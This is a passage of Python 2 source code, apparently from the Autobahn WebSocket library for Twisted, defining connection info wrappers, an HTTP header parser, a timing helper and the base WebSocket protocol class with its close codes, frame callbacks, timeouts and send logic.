:param protocols: The WebSocket (sub)protocols the client announced. You must select and return one of those (or None) in :meth:`autobahn.websocket.WebSocketServerProtocol.onConnect`.
:type protocols: array of strings
:param extensions: The WebSocket extensions the client requested and the server accepted (and thus will be spoken, when WS connection is established).
:type extensions: array of strings
"""
self.peer = peer
self.peerstr = peerstr
self.headers = headers
self.host = host
self.path = path
self.params = params
self.version = version
self.origin = origin
self.protocols = protocols
self.extensions = extensions
class ConnectionResponse():
"""
Thin-wrapper for WebSocket connection response information
provided in :meth:`autobahn.websocket.WebSocketClientProtocol.onConnect` when a WebSocket
client has established a connection to a WebSocket server.
"""
def __init__(self, peer, peerstr, headers, version, protocol, extensions):
"""
Constructor.
:param peer: IP address/port of the connected server.
:type peer: object
:param peerstr: IP address/port of the connected server as string.
:type peerstr: str
:param headers: HTTP headers from opening handshake response.
:type headers: dict
:param version: The WebSocket protocol version that is spoken.
:type version: int
:param protocol: The WebSocket (sub)protocol in use.
:type protocol: str
:param extensions: The WebSocket extensions in use.
:type extensions: array of strings
"""
self.peer = peer
self.peerstr = peerstr
self.headers = headers
self.version = version
self.protocol = protocol
self.extensions = extensions
def parseHttpHeader(data):
"""
Parses the beginning of a HTTP request header (the data up to the \n\n line) into a pair
of status line and HTTP headers dictionary.
Header keys are normalized to all-lower-case.
FOR INTERNAL USE ONLY!
:param data: The HTTP header data up to the \n\n line.
:type data: str
:returns: tuple -- Tuple of HTTP status line, headers and headers count.
"""
raw = data.splitlines()
http_status_line = raw[0].strip()
http_headers = {}
http_headers_cnt = {}
for h in raw[1:]:
i = h.find(":")
if i > 0:
## HTTP header keys are case-insensitive
key = h[:i].strip().lower()
## not sure if UTF-8 is allowed for HTTP header values..
value = h[i+1:].strip().decode("utf-8")
## handle HTTP headers split across multiple lines
if http_headers.has_key(key):
http_headers[key] += ", %s" % value
http_headers_cnt[key] += 1
else:
http_headers[key] = value
http_headers_cnt[key] = 1
else:
# skip bad HTTP header
pass
return (http_status_line, http_headers, http_headers_cnt)
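## Illustrative example (not part of the original module): for the raw data
##   "GET /chat HTTP/1.1\r\nHost: server.example.com\r\nUpgrade: websocket\r\n"
## this returns ("GET /chat HTTP/1.1",
##               {"host": u"server.example.com", "upgrade": u"websocket"},
##               {"host": 1, "upgrade": 1}).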
class Timings:
"""
Helper class to track timings by key. This class also supports item access,
iteration and conversion to string.
"""
def __init__(self):
self._stopwatch = Stopwatch()
self._timings = {}
def track(self, key):
"""
Track elapsed for key.
:param key: Key under which to track the timing.
:type key: str
"""
self._timings[key] = self._stopwatch.elapsed()
def diff(self, startKey, endKey, format = True):
"""
Get elapsed difference between two previously tracked keys.
:param startKey: First key for interval (older timestamp).
:type startKey: str
:param endKey: Second key for interval (younger timestamp).
:type endKey: str
:param format: If `True`, format computed time period and return string.
:type format: bool
:returns: float or str -- Computed time period in seconds (or formatted string).
"""
if self._timings.has_key(endKey) and self._timings.has_key(startKey):
d = self._timings[endKey] - self._timings[startKey]
if format:
if d < 0.00001: # 10us
s = "%d ns" % round(d * 1000000000.)
elif d < 0.01: # 10ms
s = "%d us" % round(d * 1000000.)
elif d < 10: # 10s
s = "%d ms" % round(d * 1000.)
else:
s = "%d s" % round(d)
return s.rjust(8)
else:
return d
else:
if format:
return "n.a.".rjust(8)
else:
return None
def __getitem__(self, key):
return self._timings.get(key, None)
def __iter__(self):
      return iter(self._timings)
def __str__(self):
return pformat(self._timings)
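## Illustrative usage (keys are whatever the caller chooses to track; "onMessage"
## is used further below, "handshake" here is hypothetical):
##   t = Timings()
##   t.track("handshake")
##   t.track("onMessage")
##   t.diff("handshake", "onMessage")   # e.g. "   12 ms" (right-justified to 8 chars)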
class WebSocketProtocol(protocol.Protocol):
"""
A Twisted Protocol class for WebSocket. This class is used by both WebSocket
client and server protocol version. It is unusable standalone, for example
the WebSocket initial handshake is implemented in derived class differently
for clients and servers.
"""
SUPPORTED_SPEC_VERSIONS = [0, 10, 11, 12, 13, 14, 15, 16, 17, 18]
"""
WebSocket protocol spec (draft) versions supported by this implementation.
Use of version 18 indicates RFC6455. Use of versions < 18 indicate actual
draft spec versions (Hybi-Drafts). Use of version 0 indicates Hixie-76.
"""
SUPPORTED_PROTOCOL_VERSIONS = [0, 8, 13]
"""
WebSocket protocol versions supported by this implementation. For Hixie-76,
there is no protocol version announced in HTTP header, and we just use the
draft version (0) in this case.
"""
SPEC_TO_PROTOCOL_VERSION = {0: 0, 10: 8, 11: 8, 12: 8, 13: 13, 14: 13, 15: 13, 16: 13, 17: 13, 18: 13}
"""
Mapping from protocol spec (draft) version to protocol version. For Hixie-76,
there is no protocol version announced in HTTP header, and we just use the
pseudo protocol version 0 in this case.
"""
PROTOCOL_TO_SPEC_VERSION = {0: 0, 8: 12, 13: 18}
"""
Mapping from protocol version to the latest protocol spec (draft) version
using that protocol version. For Hixie-76, there is no protocol version
announced in HTTP header, and we just use the draft version (0) in this case.
"""
DEFAULT_SPEC_VERSION = 18
"""
Default WebSocket protocol spec version this implementation speaks: final RFC6455.
"""
DEFAULT_ALLOW_HIXIE76 = False
"""
By default, this implementation will not allow to speak the obsoleted
Hixie-76 protocol version. That protocol version has security issues, but
is still spoken by some clients. Enable at your own risk! Enabling can be
done by using setProtocolOptions() on the factories for clients and servers.
"""
_WS_MAGIC = "258EAFA5-E914-47DA-95CA-C5AB0DC85B11"
"""
Protocol defined magic used during WebSocket handshake (used in Hybi-drafts
and final RFC6455.
"""
_QUEUED_WRITE_DELAY = 0.00001
"""
For synched/chopped writes, this is the reactor reentry delay in seconds.
"""
MESSAGE_TYPE_TEXT = 1
"""
WebSocket text message type (UTF-8 payload).
"""
MESSAGE_TYPE_BINARY = 2
"""
WebSocket binary message type (arbitrary binary payload).
"""
## WebSocket protocol state:
## (STATE_PROXY_CONNECTING) => STATE_CONNECTING => STATE_OPEN => STATE_CLOSING => STATE_CLOSED
##
STATE_CLOSED = 0
STATE_CONNECTING = 1
STATE_CLOSING = 2
STATE_OPEN = 3
STATE_PROXY_CONNECTING = 4
## Streaming Send State
SEND_STATE_GROUND = 0
SEND_STATE_MESSAGE_BEGIN = 1
SEND_STATE_INSIDE_MESSAGE = 2
SEND_STATE_INSIDE_MESSAGE_FRAME = 3
## WebSocket protocol close codes
##
CLOSE_STATUS_CODE_NORMAL = 1000
"""Normal close of connection."""
CLOSE_STATUS_CODE_GOING_AWAY = 1001
"""Going away."""
CLOSE_STATUS_CODE_PROTOCOL_ERROR = 1002
"""Protocol error."""
CLOSE_STATUS_CODE_UNSUPPORTED_DATA = 1003
"""Unsupported data."""
CLOSE_STATUS_CODE_RESERVED1 = 1004
"""RESERVED"""
CLOSE_STATUS_CODE_NULL = 1005 # MUST NOT be set in close frame!
"""No status received. (MUST NOT be used as status code when sending a close)."""
CLOSE_STATUS_CODE_ABNORMAL_CLOSE = 1006 # MUST NOT be set in close frame!
"""Abnormal close of connection. (MUST NOT be used as status code when sending a close)."""
CLOSE_STATUS_CODE_INVALID_PAYLOAD = 1007
"""Invalid frame payload data."""
CLOSE_STATUS_CODE_POLICY_VIOLATION = 1008
"""Policy violation."""
CLOSE_STATUS_CODE_MESSAGE_TOO_BIG = 1009
"""Message too big."""
CLOSE_STATUS_CODE_MANDATORY_EXTENSION = 1010
"""Mandatory extension."""
CLOSE_STATUS_CODE_INTERNAL_ERROR = 1011
"""The peer encountered an unexpected condition or internal error."""
CLOSE_STATUS_CODE_TLS_HANDSHAKE_FAILED = 1015 # MUST NOT be set in close frame!
"""TLS handshake failed, i.e. server certificate could not be verified. (MUST NOT be used as status code when sending a close)."""
CLOSE_STATUS_CODES_ALLOWED = [CLOSE_STATUS_CODE_NORMAL,
CLOSE_STATUS_CODE_GOING_AWAY,
CLOSE_STATUS_CODE_PROTOCOL_ERROR,
CLOSE_STATUS_CODE_UNSUPPORTED_DATA,
CLOSE_STATUS_CODE_INVALID_PAYLOAD,
CLOSE_STATUS_CODE_POLICY_VIOLATION,
CLOSE_STATUS_CODE_MESSAGE_TOO_BIG,
CLOSE_STATUS_CODE_MANDATORY_EXTENSION,
CLOSE_STATUS_CODE_INTERNAL_ERROR]
"""Status codes allowed to send in close."""
def onOpen(self):
"""
Callback when initial WebSocket handshake was completed. Now you may send messages.
Default implementation does nothing. Override in derived class.
Modes: Hybi, Hixie
"""
if self.debugCodePaths:
log.msg("WebSocketProtocol.onOpen")
def onMessageBegin(self, opcode):
"""
Callback when receiving a new message has begun. Default implementation will
prepare to buffer message frames. Override in derived class.
Modes: Hybi, Hixie
:param opcode: Opcode of message.
:type opcode: int
"""
self.message_opcode = opcode
self.message_data = []
self.message_data_total_length = 0
def onMessageFrameBegin(self, length, reserved):
"""
Callback when receiving a new message frame has begun. Default implementation will
prepare to buffer message frame data. Override in derived class.
Modes: Hybi
:param length: Payload length of message frame which is to be received.
:type length: int
:param reserved: Reserved bits set in frame (an integer from 0 to 7).
:type reserved: int
"""
self.frame_length = length
self.frame_reserved = reserved
self.frame_data = []
self.message_data_total_length += length
if not self.failedByMe:
if self.maxMessagePayloadSize > 0 and self.message_data_total_length > self.maxMessagePayloadSize:
self.wasMaxMessagePayloadSizeExceeded = True
self.failConnection(WebSocketProtocol.CLOSE_STATUS_CODE_MESSAGE_TOO_BIG, "message exceeds payload limit of %d octets" % self.maxMessagePayloadSize)
elif self.maxFramePayloadSize > 0 and length > self.maxFramePayloadSize:
self.wasMaxFramePayloadSizeExceeded = True
self.failConnection(WebSocketProtocol.CLOSE_STATUS_CODE_POLICY_VIOLATION, "frame exceeds payload limit of %d octets" % self.maxFramePayloadSize)
def onMessageFrameData(self, payload):
"""
      Callback when receiving data within a message frame. Default implementation will
buffer data for frame. Override in derived class.
Modes: Hybi, Hixie
Notes:
- For Hixie mode, this method is slightly misnamed for historic reasons.
:param payload: Partial payload for message frame.
:type payload: str
"""
if not self.failedByMe:
if self.websocket_version == 0:
self.message_data_total_length += len(payload)
if self.maxMessagePayloadSize > 0 and self.message_data_total_length > self.maxMessagePayloadSize:
self.wasMaxMessagePayloadSizeExceeded = True
self.failConnection(WebSocketProtocol.CLOSE_STATUS_CODE_MESSAGE_TOO_BIG, "message exceeds payload limit of %d octets" % self.maxMessagePayloadSize)
self.message_data.append(payload)
else:
self.frame_data.append(payload)
def onMessageFrameEnd(self):
"""
Callback when a message frame has been completely received. Default implementation
will flatten the buffered frame data and callback onMessageFrame. Override
in derived class.
Modes: Hybi
"""
if not self.failedByMe:
self.onMessageFrame(self.frame_data, self.frame_reserved)
self.frame_data = None
def onMessageFrame(self, payload, reserved):
"""
Callback fired when complete message frame has been received. Default implementation
will buffer frame for message. Override in derived class.
Modes: Hybi
:param payload: Message frame payload.
:type payload: list of str
:param reserved: Reserved bits set in frame (an integer from 0 to 7).
:type reserved: int
"""
if not self.failedByMe:
self.message_data.extend(payload)
def onMessageEnd(self):
"""
Callback when a message has been completely received. Default implementation
will flatten the buffered frames and callback onMessage. Override
in derived class.
Modes: Hybi, Hixie
"""
if not self.failedByMe:
payload = ''.join(self.message_data)
if self.trackedTimings:
self.trackedTimings.track("onMessage")
self.onMessage(payload, self.message_opcode == WebSocketProtocol.MESSAGE_TYPE_BINARY)
self.message_data = None
def onMessage(self, payload, binary):
"""
Callback when a complete message was received. Default implementation does nothing.
Override in derived class.
Modes: Hybi, Hixie
:param payload: Message payload (UTF-8 encoded text string or binary string). Can also be an empty string, when message contained no payload.
:type payload: str
:param binary: If True, payload is binary, otherwise text.
:type binary: bool
"""
if self.debug:
log.msg("WebSocketProtocol.onMessage")
def onPing(self, payload):
"""
Callback when Ping was received. Default implementation responds
with a Pong. Override in derived class.
Modes: Hybi
:param payload: Payload of Ping, when there was any. Can be arbitrary, up to 125 octets.
:type payload: str
"""
if self.debug:
log.msg("WebSocketProtocol.onPing")
if self.state == WebSocketProtocol.STATE_OPEN:
self.sendPong(payload)
def onPong(self, payload):
"""
Callback when Pong was received. Default implementation does nothing.
Override in derived class.
Modes: Hybi
:param payload: Payload of Pong, when there was any. Can be arbitrary, up to 125 octets.
"""
if self.debug:
log.msg("WebSocketProtocol.onPong")
def onClose(self, wasClean, code, reason):
"""
Callback when the connection has been closed. Override in derived class.
Modes: Hybi, Hixie
:param wasClean: True, iff the connection was closed cleanly.
:type wasClean: bool
:param code: None or close status code (sent by peer), if there was one (:class:`WebSocketProtocol`.CLOSE_STATUS_CODE_*).
:type code: int
      :param reason: None or close reason (sent by peer) (when present, a status code MUST also have been present).
:type reason: str
"""
if self.debugCodePaths:
s = "WebSocketProtocol.onClose:\n"
s += "wasClean=%s\n" % wasClean
s += "code=%s\n" % code
s += "reason=%s\n" % reason
s += "self.closedByMe=%s\n" % self.closedByMe
s += "self.failedByMe=%s\n" % self.failedByMe
s += "self.droppedByMe=%s\n" % self.droppedByMe
s += "self.wasClean=%s\n" % self.wasClean
s += "self.wasNotCleanReason=%s\n" % self.wasNotCleanReason
s += "self.localCloseCode=%s\n" % self.localCloseCode
s += "self.localCloseReason=%s\n" % self.localCloseReason
s += "self.remoteCloseCode=%s\n" % self.remoteCloseCode
s += "self.remoteCloseReason=%s\n" % self.remoteCloseReason
log.msg(s)
def onCloseFrame(self, code, reasonRaw):
"""
Callback when a Close frame was received. The default implementation answers by
sending a Close when no Close was sent before. Otherwise it drops
the TCP connection either immediately (when we are a server) or after a timeout
(when we are a client and expect the server to drop the TCP).
Modes: Hybi, Hixie
Notes:
- For Hixie mode, this method is slightly misnamed for historic reasons.
- For Hixie mode, code and reasonRaw are silently ignored.
:param code: None or close status code, if there was one (:class:`WebSocketProtocol`.CLOSE_STATUS_CODE_*).
:type code: int
      :param reasonRaw: None or close reason (when present, a status code MUST also have been present).
      :type reasonRaw: str
"""
if self.debugCodePaths:
log.msg("WebSocketProtocol.onCloseFrame")
self.remoteCloseCode = code
self.remoteCloseReason = reasonRaw
## reserved close codes: 0-999, 1004, 1005, 1006, 1011-2999, >= 5000
##
if code is not None and (code < 1000 or (code >= 1000 and code <= 2999 and code not in WebSocketProtocol.CLOSE_STATUS_CODES_ALLOWED) or code >= 5000):
if self.protocolViolation("invalid close code %d" % code):
return True
## closing reason
##
if reasonRaw is not None:
## we use our own UTF-8 validator to get consistent and fully conformant
## UTF-8 validation behavior
u = Utf8Validator()
val = u.validate(reasonRaw)
if not val[0]:
if self.invalidPayload("invalid close reason (non-UTF-8 payload)"):
return True
if self.state == WebSocketProtocol.STATE_CLOSING:
## We already initiated the closing handshake, so this
## is the peer's reply to our close frame.
## cancel any closing HS timer if present
##
if self.closeHandshakeTimeoutCall is not None:
if self.debugCodePaths:
log.msg("closeHandshakeTimeoutCall.cancel")
self.closeHandshakeTimeoutCall.cancel()
self.closeHandshakeTimeoutCall = None
self.wasClean = True
if self.isServer:
## When we are a server, we immediately drop the TCP.
self.dropConnection(abort = True)
else:
## When we are a client, the server should drop the TCP
## If that doesn't happen, we do. And that will set wasClean = False.
if self.serverConnectionDropTimeout > 0:
self.serverConnectionDropTimeoutCall = reactor.callLater(self.serverConnectionDropTimeout, self.onServerConnectionDropTimeout)
elif self.state == WebSocketProtocol.STATE_OPEN:
## The peer initiates a closing handshake, so we reply
## by sending close frame.
self.wasClean = True
if self.websocket_version == 0:
self.sendCloseFrame(isReply = True)
else:
## Either reply with same code/reason, or code == NORMAL/reason=None
if self.echoCloseCodeReason:
               self.sendCloseFrame(code = code, reasonUtf8 = reasonRaw, isReply = True)
else:
self.sendCloseFrame(code = WebSocketProtocol.CLOSE_STATUS_CODE_NORMAL, isReply = True)
if self.isServer:
## When we are a server, we immediately drop the TCP.
self.dropConnection(abort = False)
else:
## When we are a client, we expect the server to drop the TCP,
## and when the server fails to do so, a timeout in sendCloseFrame()
## will set wasClean = False back again.
pass
else:
## STATE_PROXY_CONNECTING, STATE_CONNECTING, STATE_CLOSED
raise Exception("logic error")
def onServerConnectionDropTimeout(self):
"""
We (a client) expected the peer (a server) to drop the connection,
but it didn't (in time self.serverConnectionDropTimeout).
So we drop the connection, but set self.wasClean = False.
Modes: Hybi, Hixie
"""
self.serverConnectionDropTimeoutCall = None
if self.state != WebSocketProtocol.STATE_CLOSED:
if self.debugCodePaths:
log.msg("onServerConnectionDropTimeout")
self.wasClean = False
self.wasNotCleanReason = "server did not drop TCP connection (in time)"
self.wasServerConnectionDropTimeout = True
self.dropConnection(abort = True)
else:
if self.debugCodePaths:
log.msg("skipping onServerConnectionDropTimeout since connection is already closed")
def onOpenHandshakeTimeout(self):
"""
      We expected the peer to complete the opening handshake with us.
It didn't do so (in time self.openHandshakeTimeout).
So we drop the connection, but set self.wasClean = False.
Modes: Hybi, Hixie
"""
self.openHandshakeTimeoutCall = None
if self.state in [WebSocketProtocol.STATE_CONNECTING, WebSocketProtocol.STATE_PROXY_CONNECTING]:
if self.debugCodePaths:
log.msg("onOpenHandshakeTimeout fired")
self.wasClean = False
self.wasNotCleanReason = "peer did not finish (in time) the opening handshake"
self.wasOpenHandshakeTimeout = True
self.dropConnection(abort = True)
elif self.state == WebSocketProtocol.STATE_OPEN:
if self.debugCodePaths:
log.msg("skipping onOpenHandshakeTimeout since WebSocket connection is open (opening handshake already finished)")
elif self.state == WebSocketProtocol.STATE_CLOSING:
if self.debugCodePaths:
log.msg("skipping onOpenHandshakeTimeout since WebSocket connection is closing")
elif self.state == WebSocketProtocol.STATE_CLOSED:
if self.debugCodePaths:
log.msg("skipping onOpenHandshakeTimeout since WebSocket connection already closed")
else:
# should not arrive here
raise Exception("logic error")
def onCloseHandshakeTimeout(self):
"""
We expected the peer to respond to us initiating a close handshake. It didn't
respond (in time self.closeHandshakeTimeout) with a close response frame though.
So we drop the connection, but set self.wasClean = False.
Modes: Hybi, Hixie
"""
self.closeHandshakeTimeoutCall = None
if self.state != WebSocketProtocol.STATE_CLOSED:
if self.debugCodePaths:
log.msg("onCloseHandshakeTimeout fired")
self.wasClean = False
self.wasNotCleanReason = "peer did not respond (in time) in closing handshake"
self.wasCloseHandshakeTimeout = True
self.dropConnection(abort = True)
else:
if self.debugCodePaths:
log.msg("skipping onCloseHandshakeTimeout since connection is already closed")
def dropConnection(self, abort = False):
"""
Drop the underlying TCP connection. For abort parameter, see:
* http://twistedmatrix.com/documents/current/core/howto/servers.html#auto2
* https://github.com/tavendo/AutobahnPython/issues/96
Modes: Hybi, Hixie
"""
if self.state != WebSocketProtocol.STATE_CLOSED:
if self.debugCodePaths:
log.msg("dropping connection")
self.droppedByMe = True
self.state = WebSocketProtocol.STATE_CLOSED
if abort:
self.transport.abortConnection()
else:
self.transport.loseConnection()
else:
if self.debugCodePaths:
log.msg("skipping dropConnection since connection is already closed")
def failConnection(self, code = CLOSE_STATUS_CODE_GOING_AWAY, reason = "Going Away"):
"""
Fails the WebSocket connection.
Modes: Hybi, Hixie
Notes:
- For Hixie mode, the code and reason are silently ignored.
"""
if self.state != WebSocketProtocol.STATE_CLOSED:
if self.debugCodePaths:
log.msg("Failing connection : %s - %s" % (code, reason))
self.failedByMe = True
if self.failByDrop:
## brutally drop the TCP connection
self.wasClean = False
self.wasNotCleanReason = "I failed the WebSocket connection by dropping the TCP connection"
self.dropConnection(abort = True)
else:
## perform WebSocket closing handshake
if self.state != WebSocketProtocol.STATE_CLOSING:
self.sendCloseFrame(code = code, reasonUtf8 = reason.encode("UTF-8"), isReply = False)
else:
if self.debugCodePaths:
log.msg("skipping failConnection since connection is already closing")
else:
if self.debugCodePaths:
log.msg("skipping failConnection since connection is already closed")
def protocolViolation(self, reason):
"""
Fired when a WebSocket protocol violation/error occurs.
Modes: Hybi, Hixie
Notes:
- For Hixie mode, reason is silently ignored.
:param reason: Protocol violation that was encountered (human readable).
:type reason: str
:returns: bool -- True, when any further processing should be discontinued.
"""
if self.debugCodePaths:
log.msg("Protocol violation : %s" % reason)
self.failConnection(WebSocketProtocol.CLOSE_STATUS_CODE_PROTOCOL_ERROR, reason)
if self.failByDrop:
return True
else:
## if we don't immediately drop the TCP, we need to skip the invalid frame
## to continue to later receive the closing handshake reply
return False
def invalidPayload(self, reason):
"""
Fired when invalid payload is encountered. Currently, this only happens
for text message when payload is invalid UTF-8 or close frames with
close reason that is invalid UTF-8.
Modes: Hybi, Hixie
Notes:
- For Hixie mode, reason is silently ignored.
:param reason: What was invalid for the payload (human readable).
:type reason: str
:returns: bool -- True, when any further processing should be discontinued.
"""
if self.debugCodePaths:
log.msg("Invalid payload : %s" % reason)
self.failConnection(WebSocketProtocol.CLOSE_STATUS_CODE_INVALID_PAYLOAD, reason)
if self.failByDrop:
return True
else:
## if we don't immediately drop the TCP, we need to skip the invalid frame
## to continue to later receive the closing handshake reply
return False
def setTrackTimings(self, enable):
"""
Enable/disable tracking of detailed timings.
:param enable: Turn time tracking on/off.
:type enable: bool
"""
if not hasattr(self, 'trackTimings') or self.trackTimings != enable:
self.trackTimings = enable
if self.trackTimings:
self.trackedTimings = Timings()
else:
self.trackedTimings = None
def doTrack(self, msg):
if not hasattr(self, 'trackTimings') or not self.trackTimings:
return
self.trackedTimings.track(msg)
def connectionMade(self):
"""
This is called by Twisted framework when a new TCP connection has been established
and handed over to a Protocol instance (an instance of this class).
Modes: Hybi, Hixie
"""
## copy default options from factory (so we are not affected by changed on those)
##
self.debug = self.factory.debug
self.debugCodePaths = self.factory.debugCodePaths
self.logOctets = self.factory.logOctets
self.logFrames = self.factory.logFrames
self.setTrackTimings(self.factory.trackTimings)
self.allowHixie76 = self.factory.allowHixie76
self.utf8validateIncoming = self.factory.utf8validateIncoming
self.applyMask = self.factory.applyMask
self.maxFramePayloadSize = self.factory.maxFramePayloadSize
self.maxMessagePayloadSize = self.factory.maxMessagePayloadSize
self.autoFragmentSize = self.factory.autoFragmentSize
self.failByDrop = self.factory.failByDrop
self.echoCloseCodeReason = self.factory.echoCloseCodeReason
self.openHandshakeTimeout = self.factory.openHandshakeTimeout
self.closeHandshakeTimeout = self.factory.closeHandshakeTimeout
self.tcpNoDelay = self.factory.tcpNoDelay
if self.isServer:
self.versions = self.factory.versions
self.webStatus = self.factory.webStatus
self.requireMaskedClientFrames = self.factory.requireMaskedClientFrames
self.maskServerFrames = self.factory.maskServerFrames
else:
self.version = self.factory.version
self.acceptMaskedServerFrames = self.factory.acceptMaskedServerFrames
self.maskClientFrames = self.factory.maskClientFrames
self.serverConnectionDropTimeout = self.factory.serverConnectionDropTimeout
## Set "Nagle"
self.transport.setTcpNoDelay(self.tcpNoDelay)
## the peer we are connected to
self.peer = self.transport.getPeer()
self.peerstr = "%s:%d" % (self.peer.host, self.peer.port)
## initial state
if not self.isServer and self.factory.proxy is not None:
self.state = WebSocketProtocol.STATE_PROXY_CONNECTING
else:
self.state = WebSocketProtocol.STATE_CONNECTING
self.send_state = WebSocketProtocol.SEND_STATE_GROUND
self.data = ""
## for chopped/synched sends, we need to queue to maintain
## ordering when recalling the reactor to actually "force"
## the octets to wire (see test/trickling in the repo)
self.send_queue = deque()
self.triggered = False
## incremental UTF8 validator
self.utf8validator = Utf8Validator()
## track when frame/message payload sizes (incoming) were exceeded
self.wasMaxFramePayloadSizeExceeded = False
self.wasMaxMessagePayloadSizeExceeded = False
## the following vars are related to connection close handling/tracking
# True, iff I have initiated closing HS (that is, did send close first)
self.closedByMe = False
# True, iff I have failed the WS connection (i.e. due to protocol error)
# Failing can be either by initiating close HS or brutal drop (this is
# controlled by failByDrop option)
self.failedByMe = False
# True, iff I dropped the TCP connection (called transport.loseConnection())
self.droppedByMe = False
# True, iff full WebSocket closing handshake was performed (close frame sent
# and received) _and_ the server dropped the TCP (which is its responsibility)
self.wasClean = False
# When self.wasClean = False, the reason (what happened)
self.wasNotCleanReason = None
# When we are a client, and we expected the server to drop the TCP, but that
# didn't happen in time, this gets True
self.wasServerConnectionDropTimeout = False
# When the initial WebSocket opening handshake times out, this gets True
self.wasOpenHandshakeTimeout = False
# When we initiated a closing handshake, but the peer did not respond in
# time, this gets True
self.wasCloseHandshakeTimeout = False
# The close code I sent in close frame (if any)
self.localCloseCode = None
# The close reason I sent in close frame (if any)
self.localCloseReason = None
# The close code the peer sent me in close frame (if any)
self.remoteCloseCode = None
# The close reason the peer sent me in close frame (if any)
self.remoteCloseReason = None
# timers, which might get set up later, and remembered here to get canceled
# when appropriate
if not self.isServer:
self.serverConnectionDropTimeoutCall = None
self.openHandshakeTimeoutCall = None
self.closeHandshakeTimeoutCall = None
# set opening handshake timeout handler
if self.openHandshakeTimeout > 0:
self.openHandshakeTimeoutCall = reactor.callLater(self.openHandshakeTimeout, self.onOpenHandshakeTimeout)
def connectionLost(self, reason):
"""
This is called by Twisted framework when a TCP connection was lost.
Modes: Hybi, Hixie
"""
## cancel any server connection drop timer if present
##
if not self.isServer and self.serverConnectionDropTimeoutCall is not None:
if self.debugCodePaths:
log.msg("serverConnectionDropTimeoutCall.cancel")
self.serverConnectionDropTimeoutCall.cancel()
self.serverConnectionDropTimeoutCall = None
self.state = WebSocketProtocol.STATE_CLOSED
if not self.wasClean:
if not self.droppedByMe and self.wasNotCleanReason is None:
self.wasNotCleanReason = "peer dropped the TCP connection without previous WebSocket closing handshake"
self.onClose(self.wasClean, WebSocketProtocol.CLOSE_STATUS_CODE_ABNORMAL_CLOSE, "connection was closed uncleanly (%s)" % self.wasNotCleanReason)
else:
self.onClose(self.wasClean, self.remoteCloseCode, self.remoteCloseReason)
def logRxOctets(self, data):
"""
Hook fired right after raw octets have been received, but only when self.logOctets == True.
Modes: Hybi, Hixie
"""
log.msg("RX Octets from %s : octets = %s" % (self.peerstr, binascii.b2a_hex(data)))
def logTxOctets(self, data, sync):
"""
Hook fired right after raw octets have been sent, but only when self.logOctets == True.
Modes: Hybi, Hixie
"""
log.msg("TX Octets to %s : sync = %s, octets = %s" % (self.peerstr, sync, binascii.b2a_hex(data)))
def logRxFrame(self, frameHeader, payload):
"""
Hook fired right after WebSocket frame has been received and decoded, but only when self.logFrames == True.
Modes: Hybi
"""
data = ''.join(payload)
info = (self.peerstr,
frameHeader.fin,
frameHeader.rsv,
frameHeader.opcode,
binascii.b2a_hex(frameHeader.mask) if frameHeader.mask else "-",
frameHeader.length,
data if frameHeader.opcode == 1 else binascii.b2a_hex(data))
log.msg("RX Frame from %s : fin = %s, rsv = %s, opcode = %s, mask = %s, length = %s, payload = %s" % info)
def logTxFrame(self, frameHeader, payload, repeatLength, chopsize, sync):
"""
Hook fired right after WebSocket frame has been encoded and sent, but only when self.logFrames == True.
Modes: Hybi
"""
info = (self.peerstr,
frameHeader.fin,
frameHeader.rsv,
frameHeader.opcode,
binascii.b2a_hex(frameHeader.mask) if frameHeader.mask else "-",
frameHeader.length,
repeatLength,
chopsize,
sync,
payload if frameHeader.opcode == 1 else binascii.b2a_hex(payload))
log.msg("TX Frame to %s : fin = %s, rsv = %s, opcode = %s, mask = %s, length = %s, repeat_length = %s, chopsize = %s, sync = %s, payload = %s" % info)
def dataReceived(self, data):
"""
This is called by Twisted framework upon receiving data on TCP connection.
Modes: Hybi, Hixie
"""
if self.logOctets:
self.logRxOctets(data)
self.data += data
self.consumeData()
def consumeData(self):
"""
Consume buffered (incoming) data.
Modes: Hybi, Hixie
"""
## WebSocket is open (handshake was completed) or close was sent
##
if self.state == WebSocketProtocol.STATE_OPEN or self.state == WebSocketProtocol.STATE_CLOSING:
## process until no more buffered data left or WS was closed
##
while self.processData() and self.state != WebSocketProtocol.STATE_CLOSED:
pass
## need to establish proxy connection
##
elif self.state == WebSocketProtocol.STATE_PROXY_CONNECTING:
self.processProxyConnect()
## WebSocket needs handshake
##
elif self.state == WebSocketProtocol.STATE_CONNECTING:
## the implementation of processHandshake() in derived
## class needs to perform client or server handshake
## from other party here ..
##
self.processHandshake()
## we failed the connection .. don't process any more data!
##
elif self.state == WebSocketProtocol.STATE_CLOSED:
## ignore any data received after WS was closed
##
if self.debugCodePaths:
log.msg("received data in STATE_CLOSED")
## should not arrive here (invalid state)
##
else:
raise Exception("invalid state")
def processProxyConnect(self):
"""
Process proxy connect.
Modes: Hybi, Hixie
"""
raise Exception("must implement proxy connect (client or server) in derived class")
def processHandshake(self):
"""
Process WebSocket handshake.
Modes: Hybi, Hixie
"""
raise Exception("must implement handshake (client or server) in derived class")
def registerProducer(self, producer, streaming):
"""
Register a Twisted producer with this protocol.
Modes: Hybi, Hixie
:param producer: A Twisted push or pull producer.
:type producer: object
:param streaming: Producer type.
:type streaming: bool
"""
self.transport.registerProducer(producer, streaming)
def _trigger(self):
"""
Trigger sending stuff from send queue (which is only used for chopped/synched writes).
Modes: Hybi, Hixie
"""
if not self.triggered:
self.triggered = True
self._send()
def _send(self):
"""
Send out stuff from send queue. For details how this works, see test/trickling
in the repo.
Modes: Hybi, Hixie
"""
if len(self.send_queue) > 0:
e = self.send_queue.popleft()
if self.state != WebSocketProtocol.STATE_CLOSED:
self.transport.write(e[0])
if self.logOctets:
self.logTxOctets(e[0], e[1])
else:
if self.debugCodePaths:
log.msg("skipped delayed write, since connection is closed")
# we need to reenter the reactor to make the latter
# reenter the OS network stack, so that octets
# can get on the wire. Note: this is a "heuristic",
# since there is no (easy) way to really force out
# octets from the OS network stack to wire.
reactor.callLater(WebSocketProtocol._QUEUED_WRITE_DELAY, self._send)
else:
self.triggered = False
def sendData(self, data, sync = False, chopsize = None):
"""
Wrapper for self.transport.write which allows giving a chopsize.
When asked to chop up writing to TCP stream, we write only chopsize octets
and then give up control to select() in underlying reactor so that bytes
get onto wire immediately. Note that this is different from and unrelated
to WebSocket data message fragmentation. Note that this is also different
from the TcpNoDelay option which can be set on the socket.
Modes: Hybi, Hixie
"""
if chopsize and chopsize > 0:
i = 0
n = len(data)
done = False
while not done:
j = i + chopsize
if j >= n:
done = True
j = n
self.send_queue.append((data[i:j], True))
i += chopsize
self._trigger()
else:
if sync or len(self.send_queue) > 0:
